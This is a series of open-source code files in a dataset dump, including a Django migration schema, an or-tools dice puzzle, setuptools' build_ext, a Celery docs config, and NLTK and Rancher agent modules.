'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'record': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'notification_routes'", 'to': "orm['indivo.Record']"})
},
'indivo.reqtoken': {
'Meta': {'object_name': 'ReqToken', '_ormbases': ['indivo.Principal']},
'authorized_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'authorized_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Account']", 'null': 'True'}),
'carenet': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Carenet']", 'null': 'True'}),
'oauth_callback': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True'}),
'pha': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.PHA']"}),
'principal_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Principal']", 'unique': 'True', 'primary_key': 'True'}),
'record': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Record']", 'null': 'True'}),
'share': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.PHAShare']", 'null': 'True'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'token_secret': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'verifier': ('django.db.models.fields.CharField', [], {'max_length': '60'})
},
'indivo.sessionrequesttoken': {
'Meta': {'object_name': 'SessionRequestToken'},
'approved_p': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sessionrequesttoken_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'secret': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Account']", 'null': 'True'})
},
'indivo.sessiontoken': {
'Meta': {'object_name': 'SessionToken'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sessiontoken_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'expires_at': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'secret': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Account']", 'null': 'True'})
},
'indivo.simpleclinicalnote': {
'Meta': {'object_name': 'SimpleClinicalNote', '_ormbases': ['indivo.Fact']},
'chief_complaint': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'content': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'date_of_visit': ('django.db.models.fields.DateTimeField', [], {}),
'fact_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Fact']", 'unique': 'True', 'primary_key': 'True'}),
'finalized_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'provider_institution': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'provider_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'signed_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'specialty': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'specialty_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'specialty_type': ('django.db.models.fields.CharField', [], {'max_length': '80', 'null': 'True'}),
'specialty_value': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'}),
'visit_location': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'visit_type': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'visit_type_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'visit_type_type': ('django.db.models.fields.CharField', [], {'max_length': '80', 'null': 'True'}),
'visit_type_value': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'})
},
'indivo.statusname': {
'Meta': {'object_name': 'StatusName'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '24'})
},
'indivo.vitals': {
'Meta': {'object_name': 'Vitals', '_ormbases': ['indivo.Fact']},
'comments': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'date_measured': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'fact_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Fact']", 'unique': 'True', 'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'name_type': ('django.db.models.fields.CharField', [], {'max_length': '80', 'null': 'True'}),
'name_value': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'}),
'position': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'}),
'unit': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'unit_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'unit_type': ('django.db.models.fields.CharField', [], {'max_length': '80', 'null': 'True'}),
'unit_value': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'}),
'value': ('django.db.models.fields.FloatField', [], {})
}
}
complete_apps = ['indivo']
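# --- Editor's note (not part of the generated migration): under South this
# schema change would typically be applied with a command along the lines of
#     ./manage.py migrate indivo 0016
# (illustrative only; the exact invocation depends on the deployment).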
| gpl-3.0 |
petesburgh/or-tools | examples/python/labeled_dice.py | 34 | 4106 | # Copyright 2010 Hakan Kjellerstrand [email protected]
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Labeled dice problem in Google CP Solver.
From Jim Orlin 'Colored letters, labeled dice: a logic puzzle'
http://jimorlin.wordpress.com/2009/02/17/colored-letters-labeled-dice-a-logic-puzzle/
'''
My daughter Jenn bought a puzzle book, and showed me a cute puzzle. There
are 13 words as follows: BUOY, CAVE, CELT, FLUB, FORK, HEMP, JUDY,
JUNK, LIMN, QUIP, SWAG, VISA, WISH.
There are 24 different letters that appear in the 13 words. The question
is: can one assign the 24 letters to 4 different cubes so that the
four letters of each word appear on different cubes. (There is one
letter from each word on each cube.) It might be fun for you to try
it. I'll give a small hint at the end of this post. The puzzle was
created by Humphrey Dudley.
'''
Jim Orlin's followup 'Update on Logic Puzzle':
http://jimorlin.wordpress.com/2009/02/21/update-on-logic-puzzle/
Compare with the following models:
* ECLiPSe: http://hakank.org/eclipse/labeled_dice.ecl
* Comet : http://www.hakank.org/comet/labeled_dice.co
* Gecode : http://hakank.org/gecode/labeled_dice.cpp
* SICStus: http://hakank.org/sicstus/labeled_dice.pl
* Zinc : http://hakank.org/minizinc/labeled_dice.zinc
This model was created by Hakan Kjellerstrand ([email protected])
Also see my other Google CP Solver models:
http://www.hakank.org/google_or_tools/
"""
from ortools.constraint_solver import pywrapcp
def main():
# Create the solver.
solver = pywrapcp.Solver("Labeled dice")
#
# data
#
n = 4
m = 24
A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, Y = (
range(m))
letters = ["A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M",
"N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "Y"]
num_words = 13
words = [
[B, U, O, Y],
[C, A, V, E],
[C, E, L, T],
[F, L, U, B],
[F, O, R, K],
[H, E, M, P],
[J, U, D, Y],
[J, U, N, K],
[L, I, M, N],
[Q, U, I, P],
[S, W, A, G],
[V, I, S, A],
[W, I, S, H]
]
#
# declare variables
#
dice = [solver.IntVar(0, n - 1, "dice[%i]" % i) for i in range(m)]
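  # dice[i] gives the cube (0..n-1) on which letter i is printed.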
#
# constraints
#
  # each letter of a word must be on a different die
for i in range(num_words):
solver.Add(solver.AllDifferent([dice[words[i][j]] for j in range(n)]))
  # there must be exactly 6 letters on each die
for i in range(n):
b = [solver.IsEqualCstVar(dice[j], i) for j in range(m)]
solver.Add(solver.Sum(b) == 6)
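  # (Editor's note, not in the original model: the Boolean-sum formulation
  # above is one way of stating a global cardinality constraint; a solver's
  # dedicated distribute/gcc global, where available, could express the
  # same "exactly 6 letters per die" requirement directly.)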
#
# solution and search
#
solution = solver.Assignment()
solution.Add(dice)
db = solver.Phase(dice,
solver.CHOOSE_FIRST_UNBOUND,
solver.ASSIGN_MIN_VALUE)
#
# result
#
solver.NewSearch(db)
num_solutions = 0
while solver.NextSolution():
num_solutions += 1
# print "dice:", [(letters[i],dice[i].Value()) for i in range(m)]
for d in range(n):
print "die %i:" % d,
for i in range(m):
if dice[i].Value() == d:
print letters[i],
print
print "The words with the cube label:"
for i in range(num_words):
for j in range(n):
print "%s (%i)" % (letters[words[i][j]], dice[words[i][j]].Value()),
print
print
solver.EndSearch()
print
print "num_solutions:", num_solutions
print "failures:", solver.Failures()
print "branches:", solver.Branches()
print "WallTime:", solver.WallTime()
if __name__ == "__main__":
main()
| apache-2.0 |
sursum/buckanjaren | buckanjaren/lib/python3.5/site-packages/setuptools/command/build_ext.py | 193 | 13049 | import os
import sys
import itertools
import imp
from distutils.command.build_ext import build_ext as _du_build_ext
from distutils.file_util import copy_file
from distutils.ccompiler import new_compiler
from distutils.sysconfig import customize_compiler, get_config_var
from distutils.errors import DistutilsError
from distutils import log
from setuptools.extension import Library
from setuptools.extern import six
try:
# Attempt to use Cython for building extensions, if available
from Cython.Distutils.build_ext import build_ext as _build_ext
except ImportError:
_build_ext = _du_build_ext
# make sure _config_vars is initialized
get_config_var("LDSHARED")
from distutils.sysconfig import _config_vars as _CONFIG_VARS
def _customize_compiler_for_shlib(compiler):
if sys.platform == "darwin":
# building .dylib requires additional compiler flags on OSX; here we
# temporarily substitute the pyconfig.h variables so that distutils'
# 'customize_compiler' uses them before we build the shared libraries.
tmp = _CONFIG_VARS.copy()
try:
# XXX Help! I don't have any idea whether these are right...
_CONFIG_VARS['LDSHARED'] = (
"gcc -Wl,-x -dynamiclib -undefined dynamic_lookup")
_CONFIG_VARS['CCSHARED'] = " -dynamiclib"
_CONFIG_VARS['SO'] = ".dylib"
customize_compiler(compiler)
finally:
_CONFIG_VARS.clear()
_CONFIG_VARS.update(tmp)
else:
customize_compiler(compiler)
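# --- Editor's note (not part of setuptools): the substitution above is only
# applied through setup_shlib_compiler(), i.e. when building Library()
# extensions; ordinary Extension() modules keep the stock LDSHARED settings.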
have_rtld = False
use_stubs = False
libtype = 'shared'
if sys.platform == "darwin":
use_stubs = True
elif os.name != 'nt':
try:
import dl
use_stubs = have_rtld = hasattr(dl, 'RTLD_NOW')
except ImportError:
pass
if_dl = lambda s: s if have_rtld else ''
def get_abi3_suffix():
"""Return the file extension for an abi3-compliant Extension()"""
for suffix, _, _ in (s for s in imp.get_suffixes() if s[2] == imp.C_EXTENSION):
if '.abi3' in suffix: # Unix
return suffix
elif suffix == '.pyd': # Windows
return suffix
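# --- Editor's note (not part of setuptools): on a Unix CPython 3 build
# get_abi3_suffix() typically returns something like '.abi3.so'; it falls
# through to an implicit None when no abi3-style suffix is registered
# (e.g. on Python 2).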
class build_ext(_build_ext):
def run(self):
"""Build extensions in build directory, then copy if --inplace"""
old_inplace, self.inplace = self.inplace, 0
_build_ext.run(self)
self.inplace = old_inplace
if old_inplace:
self.copy_extensions_to_source()
def copy_extensions_to_source(self):
build_py = self.get_finalized_command('build_py')
for ext in self.extensions:
fullname = self.get_ext_fullname(ext.name)
filename = self.get_ext_filename(fullname)
modpath = fullname.split('.')
package = '.'.join(modpath[:-1])
package_dir = build_py.get_package_dir(package)
dest_filename = os.path.join(package_dir,
os.path.basename(filename))
src_filename = os.path.join(self.build_lib, filename)
# Always copy, even if source is older than destination, to ensure
# that the right extensions for the current Python/platform are
# used.
copy_file(
src_filename, dest_filename, verbose=self.verbose,
dry_run=self.dry_run
)
if ext._needs_stub:
self.write_stub(package_dir or os.curdir, ext, True)
def get_ext_filename(self, fullname):
filename = _build_ext.get_ext_filename(self, fullname)
if fullname in self.ext_map:
ext = self.ext_map[fullname]
use_abi3 = (
six.PY3
and getattr(ext, 'py_limited_api')
and get_abi3_suffix()
)
if use_abi3:
so_ext = _get_config_var_837('EXT_SUFFIX')
filename = filename[:-len(so_ext)]
filename = filename + get_abi3_suffix()
if isinstance(ext, Library):
fn, ext = os.path.splitext(filename)
return self.shlib_compiler.library_filename(fn, libtype)
elif use_stubs and ext._links_to_dynamic:
d, fn = os.path.split(filename)
return os.path.join(d, 'dl-' + fn)
return filename
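# Sketch of the abi3 renaming above, with a hypothetical EXT_SUFFIX:
#
#   'pkg/_ext.cpython-36m-x86_64-linux-gnu.so'  ->  'pkg/_ext.abi3.so'
#
# i.e. the interpreter-specific suffix is stripped and replaced with the
# stable-ABI suffix reported by get_abi3_suffix().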
def initialize_options(self):
_build_ext.initialize_options(self)
self.shlib_compiler = None
self.shlibs = []
self.ext_map = {}
def finalize_options(self):
_build_ext.finalize_options(self)
self.extensions = self.extensions or []
self.check_extensions_list(self.extensions)
self.shlibs = [ext for ext in self.extensions
if isinstance(ext, Library)]
if self.shlibs:
self.setup_shlib_compiler()
for ext in self.extensions:
ext._full_name = self.get_ext_fullname(ext.name)
for ext in self.extensions:
fullname = ext._full_name
self.ext_map[fullname] = ext
# distutils 3.1 will also ask for module names
# XXX what to do with conflicts?
self.ext_map[fullname.split('.')[-1]] = ext
ltd = self.shlibs and self.links_to_dynamic(ext) or False
ns = ltd and use_stubs and not isinstance(ext, Library)
ext._links_to_dynamic = ltd
ext._needs_stub = ns
filename = ext._file_name = self.get_ext_filename(fullname)
libdir = os.path.dirname(os.path.join(self.build_lib, filename))
if ltd and libdir not in ext.library_dirs:
ext.library_dirs.append(libdir)
if ltd and use_stubs and os.curdir not in ext.runtime_library_dirs:
ext.runtime_library_dirs.append(os.curdir)
def setup_shlib_compiler(self):
compiler = self.shlib_compiler = new_compiler(
compiler=self.compiler, dry_run=self.dry_run, force=self.force
)
_customize_compiler_for_shlib(compiler)
if self.include_dirs is not None:
compiler.set_include_dirs(self.include_dirs)
if self.define is not None:
# 'define' option is a list of (name,value) tuples
for (name, value) in self.define:
compiler.define_macro(name, value)
if self.undef is not None:
for macro in self.undef:
compiler.undefine_macro(macro)
if self.libraries is not None:
compiler.set_libraries(self.libraries)
if self.library_dirs is not None:
compiler.set_library_dirs(self.library_dirs)
if self.rpath is not None:
compiler.set_runtime_library_dirs(self.rpath)
if self.link_objects is not None:
compiler.set_link_objects(self.link_objects)
# hack so distutils' build_extension() builds a library instead
compiler.link_shared_object = link_shared_object.__get__(compiler)
def get_export_symbols(self, ext):
if isinstance(ext, Library):
return ext.export_symbols
return _build_ext.get_export_symbols(self, ext)
def build_extension(self, ext):
ext._convert_pyx_sources_to_lang()
_compiler = self.compiler
try:
if isinstance(ext, Library):
self.compiler = self.shlib_compiler
_build_ext.build_extension(self, ext)
if ext._needs_stub:
cmd = self.get_finalized_command('build_py').build_lib
self.write_stub(cmd, ext)
finally:
self.compiler = _compiler
def links_to_dynamic(self, ext):
"""Return true if 'ext' links to a dynamic lib in the same package"""
# XXX this should check to ensure the lib is actually being built
# XXX as dynamic, and not just using a locally-found version or a
# XXX static-compiled version
libnames = dict.fromkeys([lib._full_name for lib in self.shlibs])
pkg = '.'.join(ext._full_name.split('.')[:-1] + [''])
return any(pkg + libname in libnames for libname in ext.libraries)
def get_outputs(self):
return _build_ext.get_outputs(self) + self.__get_stubs_outputs()
def __get_stubs_outputs(self):
# assemble the base name for each extension that needs a stub
ns_ext_bases = (
os.path.join(self.build_lib, *ext._full_name.split('.'))
for ext in self.extensions
if ext._needs_stub
)
# pair each base with the extension
pairs = itertools.product(ns_ext_bases, self.__get_output_extensions())
return list(base + fnext for base, fnext in pairs)
def __get_output_extensions(self):
yield '.py'
yield '.pyc'
if self.get_finalized_command('build_py').optimize:
yield '.pyo'
def write_stub(self, output_dir, ext, compile=False):
log.info("writing stub loader for %s to %s", ext._full_name,
output_dir)
stub_file = (os.path.join(output_dir, *ext._full_name.split('.')) +
'.py')
if compile and os.path.exists(stub_file):
raise DistutilsError(stub_file + " already exists! Please delete.")
if not self.dry_run:
f = open(stub_file, 'w')
f.write(
'\n'.join([
"def __bootstrap__():",
" global __bootstrap__, __file__, __loader__",
" import sys, os, pkg_resources, imp" + if_dl(", dl"),
" __file__ = pkg_resources.resource_filename"
"(__name__,%r)"
% os.path.basename(ext._file_name),
" del __bootstrap__",
" if '__loader__' in globals():",
" del __loader__",
if_dl(" old_flags = sys.getdlopenflags()"),
" old_dir = os.getcwd()",
" try:",
" os.chdir(os.path.dirname(__file__))",
if_dl(" sys.setdlopenflags(dl.RTLD_NOW)"),
" imp.load_dynamic(__name__,__file__)",
" finally:",
if_dl(" sys.setdlopenflags(old_flags)"),
" os.chdir(old_dir)",
"__bootstrap__()",
"" # terminal \n
])
)
f.close()
if compile:
from distutils.util import byte_compile
byte_compile([stub_file], optimize=0,
force=True, dry_run=self.dry_run)
optimize = self.get_finalized_command('install_lib').optimize
if optimize > 0:
byte_compile([stub_file], optimize=optimize,
force=True, dry_run=self.dry_run)
if os.path.exists(stub_file) and not self.dry_run:
os.unlink(stub_file)
if use_stubs or os.name == 'nt':
# Build shared libraries
#
def link_shared_object(
self, objects, output_libname, output_dir=None, libraries=None,
library_dirs=None, runtime_library_dirs=None, export_symbols=None,
debug=0, extra_preargs=None, extra_postargs=None, build_temp=None,
target_lang=None):
self.link(
self.SHARED_LIBRARY, objects, output_libname,
output_dir, libraries, library_dirs, runtime_library_dirs,
export_symbols, debug, extra_preargs, extra_postargs,
build_temp, target_lang
)
else:
# Build static libraries everywhere else
libtype = 'static'
def link_shared_object(
self, objects, output_libname, output_dir=None, libraries=None,
library_dirs=None, runtime_library_dirs=None, export_symbols=None,
debug=0, extra_preargs=None, extra_postargs=None, build_temp=None,
target_lang=None):
# XXX we need to either disallow these attrs on Library instances,
# or warn/abort here if set, or something...
# libraries=None, library_dirs=None, runtime_library_dirs=None,
# export_symbols=None, extra_preargs=None, extra_postargs=None,
# build_temp=None
assert output_dir is None # distutils build_ext doesn't pass this
output_dir, filename = os.path.split(output_libname)
basename, ext = os.path.splitext(filename)
if self.library_filename("x").startswith('lib'):
# strip 'lib' prefix; this is kludgy if some platform uses
# a different prefix
basename = basename[3:]
self.create_static_lib(
objects, basename, output_dir, debug, target_lang
)
def _get_config_var_837(name):
"""
In https://github.com/pypa/setuptools/pull/837, we discovered
Python 3.3.0 exposes the extension suffix under the name 'SO'.
"""
if sys.version_info < (3, 3, 1):
name = 'SO'
return get_config_var(name)
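# Minimal usage sketch: on the affected interpreters both names alias the same
# config value, so callers can stay version-agnostic.
#
#   so_ext = _get_config_var_837('EXT_SUFFIX')  # queries 'SO' before 3.3.1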
| mit |
KarimAllah/celery | docs/conf.py | 17 | 3240 | # -*- coding: utf-8 -*-
import sys
import os
# eventlet/gevent should not monkey patch anything.
os.environ["GEVENT_NOPATCH"] = "yes"
os.environ["EVENTLET_NOPATCH"] = "yes"
os.environ["CELERY_LOADER"] = "default"
this = os.path.dirname(os.path.abspath(__file__))
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
sys.path.append(os.path.join(os.pardir, "tests"))
sys.path.append(os.path.join(this, "_ext"))
import celery
# use app loader
from celery import Celery
app = Celery(set_as_current=True)
app.conf.update(BROKER_TRANSPORT="memory",
CELERY_RESULT_BACKEND="cache",
CELERY_CACHE_BACKEND="memory",
CELERYD_HIJACK_ROOT_LOGGER=False,
CELERYD_LOG_COLOR=False)
# General configuration
# ---------------------
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.coverage',
'sphinx.ext.pngmath',
'sphinx.ext.intersphinx',
'sphinxcontrib.issuetracker',
'celerydocs']
html_show_sphinx = False
# Add any paths that contain templates here, relative to this directory.
templates_path = ['.templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Celery'
copyright = u'2009-2011, Ask Solem & Contributors'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = ".".join(map(str, celery.VERSION[0:2]))
# The full version, including alpha/beta/rc tags.
release = celery.__version__
exclude_trees = ['.build']
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
intersphinx_mapping = {
"http://docs.python.org/dev": None,
"http://kombu.readthedocs.org/en/latest/": None,
"http://django-celery.readthedocs.org/en/latest": None,
}
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'trac'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['.static']
html_use_smartypants = True
# If false, no module index is generated.
html_use_modindex = True
# If false, no index is generated.
html_use_index = True
latex_documents = [
('index', 'Celery.tex', ur'Celery Documentation',
ur'Ask Solem & Contributors', 'manual'),
]
html_theme = "celery"
html_theme_path = ["_theme"]
html_sidebars = {
'index': ['sidebarintro.html', 'sourcelink.html', 'searchbox.html'],
'**': ['sidebarlogo.html', 'relations.html',
'sourcelink.html', 'searchbox.html'],
}
### Issuetracker
if False: #not os.environ.get("SKIP_ISSUES"):
# Issue tracker is not working, just hangs
issuetracker = "github"
issuetracker_project = "ask/celery"
issuetracker_issue_pattern = r'[Ii]ssue #(\d+)'
| bsd-3-clause |
xtuml/pyxtuml | examples/list_bp_enums.py | 2 | 1385 | #!/usr/bin/env python
# encoding: utf-8
# Copyright (C) 2017 John Törnblom
#
# This file is part of pyxtuml.
#
# pyxtuml is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
#
# pyxtuml is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with pyxtuml. If not, see <http://www.gnu.org/licenses/>.
import sys
from xtuml import navigate_one as one
from bridgepoint import ooaofooa
if len(sys.argv) < 2:
print('')
print(' usage: %s <path to bridgepoint model folder>' % sys.argv[0])
print('')
sys.exit(1)
m = ooaofooa.load_metamodel(sys.argv[1])
get_name = lambda inst: one(inst).S_DT[17]().Name
for s_edt in sorted(m.select_many('S_EDT'), key=get_name):
print(get_name(s_edt))
is_first = lambda inst: not one(inst).S_ENUM[56, 'succeeds']()
s_enum = one(s_edt).S_ENUM[27](is_first)
while s_enum:
print(' %s' % s_enum.Name)
s_enum = one(s_enum).S_ENUM[56, 'precedes']()
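# Expected output shape, assuming a model that defines an enumerated data
# type (names here are hypothetical):
#
#   Boolean
#     FALSE
#     TRUE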
| lgpl-3.0 |
rancher/python-agent | cattle/agent/handler.py | 3 | 3291 | import re
import logging
from cattle import utils
from cattle.lock import lock
from cattle.utils import JsonObject
log = logging.getLogger("agent")
class BaseHandler(object):
def __init__(self):
pass
def events(self):
ret = []
for i in utils.events_from_methods(self):
ret.append(".".join([self._get_handler_category(None), i]))
return ret
def supports(self, req):
method = self._get_method_for(req)
if method is None:
return False
return self._check_supports(req)
def execute(self, req):
method = self._get_method_for(req)
if method is None:
return None
else:
return method(req=req, **req.data.__dict__)
def _get_method_for(self, req):
prefix = ''
category = self._get_handler_category(req)
if len(category) > 0:
prefix = category + '.'
if len(req.name) <= len(prefix):
return None
name = req.name[len(prefix):].replace('.', '_')
idx = name.find(';')
if idx != -1:
name = name[0:idx]
try:
return getattr(self, name)
except AttributeError:
return None
def _reply(self, req, response_data):
if req is None:
return None
resp = utils.reply(req)
resp.data = JsonObject(response_data)
return resp
def _do(self, req=None, check=None, result=None, lock_obj=None,
action=None, post_check=True):
if check():
return self._reply(req, result())
with lock(lock_obj):
if check():
return self._reply(req, result())
action()
data = result()
if post_check and not check():
raise Exception("Operation failed")
return self._reply(req, data)
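# Usage sketch for the check/lock/re-check pattern in _do (handler and helper
# names below are hypothetical, not part of this module):
#
#   def sample_activate(self, req=None, **kw):
#       return self._do(req=req,
#                       check=lambda: self._is_active(),
#                       result=lambda: {'state': 'active'},
#                       lock_obj='sample-lock',
#                       action=lambda: self._activate())
#
# The first check() skips the lock when the work is already done; repeating
# check() inside the lock makes the action safe against concurrent callers.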
def _get_response_data(self, req, obj):
resource_type = req.get("resourceType")
type = obj.get("type")
if type is not None:
inner_name = re.sub("([A-Z])", r'_\1', type)
method_name = "_get_{0}_data".format(inner_name).lower()
method = None
try:
method = getattr(self, method_name)
except AttributeError:
pass
if method is not None:
return {resource_type: method(obj)}
return {}
def _check_supports(self, req):
raise Exception("Not implemented")
def _get_handler_category(self, req):
return ''
class KindBasedMixin(object):
CHECK_PATHS = [
["imageStoragePoolMap", "storagePool", "kind"],
["instanceHostMap", "host", "kind"],
["instanceForceStop", "kind"],
["instanceInspect", "kind"],
["instancePull", "kind"]
]
def __init__(self, kind=None):
super(KindBasedMixin, self).__init__()
self._kind = kind
def _check_supports(self, req):
for check in KindBasedMixin.CHECK_PATHS:
val = req.data
try:
for part in check:
val = val[part]
if val == self._kind:
return True
except KeyError:
pass
return False
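# Example of a matching request (payload is hypothetical): a handler built
# with kind='docker' supports
#
#   req.data == {'instanceHostMap': {'host': {'kind': 'docker'}}}
#
# because the second CHECK_PATHS entry resolves to 'docker'.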
| apache-2.0 |
steven-cutting/icsisumm | icsisumm-primary-sys34_v1/nltk/nltk-0.9.2/nltk/inference/inference.py | 9 | 3449 | # Natural Language Toolkit: Interface to Theorem Provers
#
# Author: Dan Garrette <[email protected]>
# Ewan Klein <[email protected]>
#
# URL: <http://nltk.sf.net>
# For license information, see LICENSE.TXT
from nltk.sem.logic import ApplicationExpression, Operator, LogicParser
import tableau
import prover9
import mace
"""
A wrapper module that calls theorem provers and model builders.
"""
def get_prover(goal=None, assumptions=[], prover_name='Prover9'):
"""
@param goal: Input expression to prove
@type goal: L{logic.Expression}
@param assumptions: Input expressions to use as assumptions in the proof
@type assumptions: L{list} of logic.Expression objects
"""
if prover_name.lower() == 'tableau':
prover_module = tableau.Tableau
elif prover_name.lower() == 'prover9':
prover_module = prover9.Prover9
else:
raise ValueError("Unknown prover: %s" % prover_name)
return prover_module(goal, assumptions)
def get_model_builder(goal=None, assumptions=[], model_builder_name='Mace'):
"""
@param goal: Input expression to prove
@type goal: L{logic.Expression}
@param assumptions: Input expressions to use as assumptions in the proof
@type assumptions: L{list} of logic.Expression objects
"""
if model_builder_name.lower() == 'mace':
builder_module = mace.Mace
else:
raise ValueError("Unknown model builder: %s" % model_builder_name)
return builder_module(goal, assumptions)
def demo_drt_glue_remove_duplicates(show_example=-1):
from nltk_contrib.gluesemantics import drt_glue
examples = ['David sees Mary',
'David eats a sandwich',
'every man chases a dog',
'John chases himself',
'John likes a cat',
'John likes every cat',
'he likes a dog',
'a dog walks and he leaves']
example_num = 0
hit = False
for sentence in examples:
if example_num==show_example or show_example==-1:
print '[[[Example %s]]] %s' % (example_num, sentence)
readings = drt_glue.parse_to_meaning(sentence, True)
for j in range(len(readings)):
reading = readings[j].simplify().resolve_anaphora()
print reading
print ''
hit = True
example_num += 1
if not hit:
print 'example not found'
def demo():
from nltk_contrib.drt import DRT
DRT.testTp_equals()
print '\n'
lp = LogicParser()
a = lp.parse(r'some x.((man x) and (walks x))')
b = lp.parse(r'some x.((walks x) and (man x))')
bicond = ApplicationExpression(ApplicationExpression(Operator('iff'), a), b)
print "Trying to prove:\n '%s <-> %s'" % (a.infixify(), b.infixify())
print 'tableau: %s' % get_prover(bicond, prover_name='tableau').prove()
print 'Prover9: %s' % get_prover(bicond, prover_name='Prover9').prove()
print '\n'
demo_drt_glue_remove_duplicates()
lp = LogicParser()
a = lp.parse(r'all x.((man x) implies (mortal x))')
b = lp.parse(r'(man socrates)')
c1 = lp.parse(r'(mortal socrates)')
c2 = lp.parse(r'(not (mortal socrates))')
print get_prover(c1, [a,b], 'prover9').prove()
print get_prover(c2, [a,b], 'prover9').prove()
print get_model_builder(c1, [a,b], 'mace').build_model()
print get_model_builder(c2, [a,b], 'mace').build_model()
if __name__ == '__main__':
demo()
| gpl-3.0 |
Intel-tensorflow/tensorflow | tensorflow/python/eager/monitoring_test.py | 14 | 4979 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
